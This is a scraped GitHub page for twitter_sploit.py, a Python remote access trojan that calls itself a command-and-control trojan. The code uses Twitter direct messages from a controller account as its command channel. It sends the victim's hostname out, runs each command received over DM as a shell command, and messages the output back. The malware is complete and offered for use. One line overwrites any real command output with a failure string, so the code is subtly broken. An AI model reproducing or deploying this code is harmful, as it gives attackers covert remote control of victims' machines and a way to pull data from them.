forked from thehappydinoa/Twittersploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtwitter_sploit.py
More file actions
executable file
·91 lines (76 loc) · 2.6 KB
/
twitter_sploit.py
File metadata and controls
executable file
·91 lines (76 loc) · 2.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import os
import re
import time
import tweepy
## Complete API Parameters before use -- configured for victim user ##
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
## Complete info on user account ##
c2_usr = ''
# Twitter auth
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
userid = re.findall(r'(?<=u\'id\': )[0-9]+', str(api.get_user(c2_usr)))[0]
# Constant strings
CONNECTION_ESTABLISHED = "[+] Twitter RAT connection established...\n"
SOMETHING_WENT_WRONG = "[-] Something went wrong...\n"
COMMAND_RECIEVED = '[+] Command Recieved - '
COMMAND_FAILED = '[-] ERROR - COMMAND FAILED'
COMMAND_SENDING = '[+] Sending Result - \n'
def get_command(api, lastcommand):
raw_dms = api.direct_messages()
dms = re.findall(r'(?<=sender_id_str=u\'' + userid +
'\\\', text=u\')[^\']+', str(raw_dms))
if dms[0] != lastcommand:
return dms[0]
return
def write_message(api, message):
return api.send_direct_message(screen_name=c2_usr, text=message)
HOSTNAME = str(os.popen('hostname').read()).replace('\n', '')
SPLASH = '''
=====================================
==.................................==
==..........TWITTER RAT............==
==....COMMAND AND CONTROL TROJAN...==
==.................................==
=====================================
_____$$$$$s__________________________
_____$$$$$$$$s_______________________
___$$$$(O)$$$$$$_____________________
_$$$_$$$$$$$$$$______________________
_______$$$$$$$$$$s___________________
_________$$$$$$$$$$$s_____CONNECTION_
_________$$$$$$$$$$$$$$_____RECIEVED_
_________$$$$$$$$$$$$$$$$_____FROM:__
_________s$$$$$$$$$$$$$$$$$_____%s
___________$$$$$$$$$$$$$$$$$$________
_____________$$$$$$$$$$$$$$$$$$______
_________________$$$$$$$$$$$$$$$$____
_______________$$$$$______$$$$$$$$___
_________$$$$$$$$$____________$$$$$$_
''' % (HOSTNAME)
try:
write_message(api, SPLASH)
print(CONNECTION_ESTABLISHED)
except:
print(SOMETHING_WENT_WRONG)
exit(1)
last_command = get_command(api, None)
while True:
command = get_command(api, last_command)
if command:
print(COMMAND_RECIEVED + command)
time.sleep(2)
last_command = command
try:
result = os.popen(command).read()
if result:
result = COMMAND_FAILED
except:
result = COMMAND_FAILED
print(COMMAND_SENDING + result)
write_message(api, result)
time.sleep(1)